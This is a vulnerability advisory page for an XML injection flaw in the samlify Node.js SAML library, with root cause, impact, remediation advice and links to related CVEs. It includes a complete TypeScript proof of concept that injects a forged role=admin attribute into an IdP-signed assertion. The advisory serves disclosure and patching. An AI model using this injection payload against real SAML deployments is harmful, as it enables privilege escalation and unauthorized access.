Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
6Blast Radius
ecosystem impact- 60 npm packages depend on samlify (3 direct, 57 indirect)
Ecosystem-wide dependent count for version 2.13.0.
DescriptionGitHub Advisory
Summary
samlify’s template substitution only escapes attribute contexts. Values inserted into element text (e.g., <saml:AttributeValue>) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new <saml:Attribute> elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups).
Root Cause
src/libsaml.ts → replaceTagsByValue() only escapes placeholders when preceded by a quote (attribute context). Element text is inserted raw. The attribute builder inserts placeholders into element text:
<saml:AttributeValue ...>{attrUserX}</saml:AttributeValue>Therefore, </saml:AttributeValue>…<saml:Attribute …> is accepted and signed.
Proof-of-concept
- poc/attribute_injection.ts
import { readFileSync } from 'fs';
import * as samlify from '../index';
import * as validator from '@authenio/samlify-xsd-schema-validator';
samlify.setSchemaValidator(validator);
const { IdentityProvider, ServiceProvider, SamlLib: libsaml, Utility: util } = samlify as any;
const loginResponseTemplate = {
context: '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="{ID}" Version="2.0" IssueInstant="{IssueInstant}" Destination="{Destination}" InResponseTo="{InResponseTo}"><saml:Issuer>{Issuer}</saml:Issuer><samlp:Status><samlp:StatusCode Value="{StatusCode}"/></samlp:Status><saml:Assertion ID="{AssertionID}" Version="2.0" IssueInstant="{IssueInstant}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:Issuer>{Issuer}</saml:Issuer><saml:Subject><saml:NameID Format="{NameIDFormat}">{NameID}</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="{SubjectConfirmationDataNotOnOrAfter}" Recipient="{SubjectRecipient}" InResponseTo="{InResponseTo}"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="{ConditionsNotBefore}" NotOnOrAfter="{ConditionsNotOnOrAfter}"><saml:AudienceRestriction><saml:Audience>{Audience}</saml:Audience></saml:AudienceRestriction></saml:Conditions>{AttributeStatement}</saml:Assertion></samlp:Response>',
attributes: [
{ name: 'mail', valueTag: 'user.email', nameFormat: 'urn:oasis:names:tc:SAML:2.0:attrname-format:basic', valueXsiType: 'xs:string' },
{ name: 'injection', valueTag: 'user.injection', nameFormat: 'urn:oasis:names:tc:SAML:2.0:attrname-format:basic', valueXsiType: 'xs:string' },
],
};
const idp = IdentityProvider({
privateKey: readFileSync('./test/key/idp/privkey.pem'),
privateKeyPass: 'q9ALNhGT5EhfcRmp8Pg7e9zTQeP2x1bW',
isAssertionEncrypted: false,
metadata: readFileSync('./test/misc/idpmeta.xml'),
loginResponseTemplate,
});
const sp = ServiceProvider({
privateKey: readFileSync('./test/key/sp/privkey.pem'),
privateKeyPass: 'VHOSp5RUiBcrsjrcAuXFwU1NKCkGA8px',
isAssertionEncrypted: false,
metadata: readFileSync('./test/misc/spmeta.xml'),
});
const buildTemplate = (_idp: any, _sp: any, _binding: any, user: any) => (template: string) => {
const now = new Date();
const fiveMinutesLater = new Date(now.getTime() + 300_000);
const tvalue = {
ID: _idp.entitySetting.generateID(),
AssertionID: _idp.entitySetting.generateID(),
Destination: _sp.entityMeta.getAssertionConsumerService('post'),
Audience: _sp.entityMeta.getEntityID(),
SubjectRecipient: _sp.entityMeta.getAssertionConsumerService('post'),
NameIDFormat: 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress',
NameID: user.email,
Issuer: _idp.entityMeta.getEntityID(),
IssueInstant: now.toISOString(),
ConditionsNotBefore: now.toISOString(),
ConditionsNotOnOrAfter: fiveMinutesLater.toISOString(),
SubjectConfirmationDataNotOnOrAfter: fiveMinutesLater.toISOString(),
InResponseTo: 'request-id',
StatusCode: 'urn:oasis:names:tc:SAML:2.0:status:Success',
attrUserEmail: user.email,
attrUserInjection: user.injection,
};
return { id: tvalue.ID, context: libsaml.replaceTagsByValue(template, tvalue) };
};
async function main() {
const injection = [
'safe',
'</saml:AttributeValue></saml:Attribute>',
'<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">',
'<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">admin</saml:AttributeValue>',
'</saml:Attribute>',
'<saml:Attribute Name="injection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">',
'<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">safe'
].join('');
const user = { email: 'user@esaml2.com', injection };
const { context: SAMLResponse } = await idp.createLoginResponse(
sp,
{ extract: { request: { id: 'request-id' } } },
'post',
user,
buildTemplate(idp, sp, 'post', user)
);
const xml = util.base64Decode(SAMLResponse, true).toString();
console.log('--- Generated XML snippet ---');
console.log(xml.slice(xml.indexOf('<saml:AttributeStatement'), xml.indexOf('</saml:AttributeStatement>') + 26));
const { extract } = await sp.parseLoginResponse(idp, 'post', { body: { SAMLResponse } });
console.log('Parsed attributes:', extract.attributes);
}
main().catch(err => {
console.error('PoC failed:', err?.message || err);
process.exitCode = 1;
});Run:
npm install --legacy-peer-deps
npx ts-node poc/attribute_injection.tsImpact
A normal user can inject arbitrary attributes (e.g., role=admin) into a signed assertion and have them parsed by sp.parseLoginResponse(). This can grant elevated privileges in SPs that trust SAML attributes.
AnalysisAI
Privilege escalation in samlify (Node.js SAML library) versions prior to 2.13.0 allows authenticated users to inject arbitrary XML markup into signed SAML assertions because template substitution only escapes attribute contexts, not element text. An attacker with a valid account can supply crafted values in user-controlled fields (e.g., email) that close the AttributeValue element and inject additional saml:Attribute elements (such as role=admin), which the IdP then signs and the SP accepts as trusted. No public exploit identified at time of analysis beyond the vendor-published PoC in the GHSA advisory.
Technical ContextAI
samlify is a widely used npm package implementing SAML 2.0 IdP and SP flows for Node.js applications. The root cause is in src/libsaml.ts, where replaceTagsByValue() applies XML escaping only when a placeholder is preceded by a quote character (i.e., inside an XML attribute), leaving placeholders embedded in element text content unescaped. This maps to CWE-91 (XML Injection / Improper Neutralization of Special Elements used in an XML Expression): user-controlled strings are concatenated into the SAML assertion template before XML-Signature canonicalization and signing, so injected elements become part of the signed payload and are indistinguishable from legitimate attributes to the relying party.
RemediationAI
Upgrade samlify to the vendor-released patched version 2.13.0 or later (npm install samlify@^2.13.0), which is the primary and recommended fix per the GHSA-34r5-q4jw-r36m advisory at https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m. If immediate upgrade is not possible, apply input validation at the application layer to strictly whitelist characters allowed in user-supplied attribute values (reject '<', '>', '&', '"', and '/' in fields such as email, display name, and any other value passed to the loginResponseTemplate), with the trade-off that this blocks legitimate Unicode-heavy values and is a fragile defense against encoding bypasses. Additionally, on the SP side, enforce defense-in-depth by validating that each saml:Attribute appears only once and matches an expected schema before using attribute values for authorization decisions, accepting the side effect that legitimate multi-valued attributes may need explicit allowlisting.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-91 – XML Injection (aka Blind XPath Injection)
View allSame technique Privilege Escalation
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-35188
GHSA-34r5-q4jw-r36m